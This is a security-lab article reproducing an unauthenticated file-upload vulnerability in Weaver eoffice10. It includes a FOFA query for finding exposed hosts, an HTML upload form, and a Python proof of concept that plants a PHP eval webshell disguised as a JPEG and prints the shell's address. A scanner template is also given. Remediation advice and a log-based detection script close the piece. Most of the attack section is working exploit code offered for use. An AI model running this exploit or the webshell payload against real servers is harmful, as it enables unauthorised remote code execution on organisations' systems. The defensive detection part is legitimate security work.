Weaver (泛微) eoffice10 front-end getshell vulnerability reproduction - Vulnerability Library Small World - Security Library - NGC660 Security Lab


1. Vulnerability details

A vulnerability disclosed during the 2022 HVV (护网) exercise shows that the Weaver eoffice10 front end contains an unauthenticated file-upload flaw that can be used to get a shell.

2. Affected scope

Affected product versions: Weaver eoffice10

3. Reproduction

Search with FOFA:
title="eoffice10"
Build an HTML page:

<form method='post'
action='http://xx.xx.xx.xx:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/><br/><br/>
<input type="text" name="FormData" value="{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teststcs.php'}"/><br/><br/>
<button type="submit" value="Upload">Upload</button> </form>

Replace the action attribute with the target address.
Opening the page and submitting the form uploads a PHP script file, which yields a webshell.

Writing the vulnerability POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @userVersion : python 3.7
# @Author  : fsrm
# @Date    : 2022/08/08
# @Effect  : temp
# @Version : V1.1

import json
import sys
from urllib.parse import urlsplit

import requests

Header = {
    'Content-Length': '397',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'null',
    # 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarypgyxaBmmbboTooNw',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36',
    'Accept-Language': 'zh-CN',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Sec-GPC': '1',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close'
}

# proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }

def checkversion(baseurl):
    # Fingerprint the target through the public version.json file
    versionurl = baseurl + "/eoffice10/version.json"
    try:
        r = requests.get(versionurl, verify=False, timeout=10)
        jsonres = json.loads(r.text)
        if jsonres['version'] == 10:
            # print(jsonres)
            return True
        else:
            return False
    except Exception as e:
        print(str(e))
    return False

def postdata(baseurl):
    # Multipart upload to OfficeServer.php; FormData carries the SAVEFILE option and the target file name
    posturl = baseurl + "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
    files = {
        "FileData": ("1.jpg", "<?php echo(md5(cde4f31a5));@eval($_POST[stcs]);?>", "image/jpeg"),
        "FormData": (None, "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'cde4f31a5.php'}")
    }
    # r=requests.post(posturl,data=None,headers=Header,files=files,proxies=proxies)
    r = requests.post(posturl, data=None, headers=Header, files=files, verify=False, timeout=10)
    return

def checkresult(baseurl):
    # The uploaded file is served from the Document directory; check for the expected md5 marker
    checkurl = baseurl + "/eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php"
    # print(checkurl)
    r = requests.get(checkurl, verify=False, timeout=10)
    if "4e700eabf8fc3788516fb02c5d4e38e2" in r.text:
        print("[+] Vulnerable, shell address: " + checkurl)
    else:
        print("[-] Not vulnerable")

def main(url):
    result = urlsplit(url)
    basetarget = result.scheme + "://" + result.netloc
    # print(basetarget)
    versionres = checkversion(basetarget)
    if versionres == False:
        print("Not vulnerable")
        return
    # Upload the file
    postdata(basetarget)

    # Verify the result
    checkresult(basetarget)

if __name__ == '__main__':
    if len(sys.argv) > 1:
        url = sys.argv[1]
        main(url)
    else:
        print("usage: python eoffice10upload.py http://xxxxxxxx")

Execution result


tscan POC

params: []
name: fanwei_eoffice10_getshell_2022.08
set:
  randstr: randomLowercase(10)
  randint: randomInt(800000000, 1000000000)
rules:
- method: POST
  path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
  headers:
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
      like Gecko) Chrome/104.0.5112.81 Safari/537.36
  body: |-
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    Content-Disposition: form-data; name="FileData"; filename="1.jpg"
    Content-Type: image/jpeg

    <?php echo(md5({{randint}}));?>
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
    Content-Disposition: form-data; name="FormData"

    {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{randstr}}.php'}
    ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm--
  search: ""
  followredirects: false
  expression: response.status==200
- method: GET
  path: /eoffice10/server/public/iWebOffice2015/Document/{{randstr}}.php
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status==200 && response.body.bcontains(bytes(substr(md5(string(randint)),0,
    31)))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

4. Remediation advice
Upgrade to the latest version as soon as possible. Until then, restrict access to the iWebOffice2015 upload endpoint and block execution of scripts under its Document directory.
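The request chain shown in section 3 (a POST to OfficeServer.php followed by a GET of a .php file under the Document directory) is easy to spot in web-server access logs. The following detection routine is an added example written for this article, not code from the original post or from Weaver; the log lines are constructed, the common-log-format layout and the 300-second correlation window are assumptions, and the script-extension list is extended slightly beyond the .php case the article shows.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (common log format); not from any real system.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Aug/2022:10:12:01 +0800] "GET /eoffice10/version.json HTTP/1.1" 200 45
10.0.0.5 - - [08/Aug/2022:10:12:02 +0800] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 200 12
10.0.0.5 - - [08/Aug/2022:10:12:03 +0800] "GET /eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php HTTP/1.1" 200 32
10.0.0.9 - - [08/Aug/2022:10:15:00 +0800] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 200 12
10.0.0.9 - - [08/Aug/2022:10:15:01 +0800] "GET /eoffice10/server/public/iWebOffice2015/Document/report.docx HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_PATH = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
DOC_DIR = "/eoffice10/server/public/iWebOffice2015/Document/"
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extended beyond the article's .php case

def parse_line(line):
    """Parse one common-log-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}

def find_upload_chains(log_text, window_seconds=300):
    """Return (ip, path) for every client that POSTed to OfficeServer.php and then
    successfully fetched a script file from the Document directory within the window."""
    last_upload = {}  # client ip -> timestamp of its most recent POST to the upload endpoint
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOAD_PATH:
            last_upload[ev["ip"]] = ev["ts"]
        elif (ev["method"] == "GET" and ev["path"].startswith(DOC_DIR)
              and ev["path"].lower().endswith(SCRIPT_EXT) and ev["status"] == 200):
            seen = last_upload.get(ev["ip"])
            if seen is not None and ev["ts"] - seen <= timedelta(seconds=window_seconds):
                hits.append((ev["ip"], ev["path"]))
    return hits

if __name__ == "__main__":
    for ip, path in find_upload_chains(SAMPLE_LOG):
        print(f"[!] possible webshell upload from {ip}: {path}")
```

A client that fetches a regular document (the 10.0.0.9 entries) after an upload is not flagged, so the rule keys on script execution from the Document directory rather than on upload activity alone.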
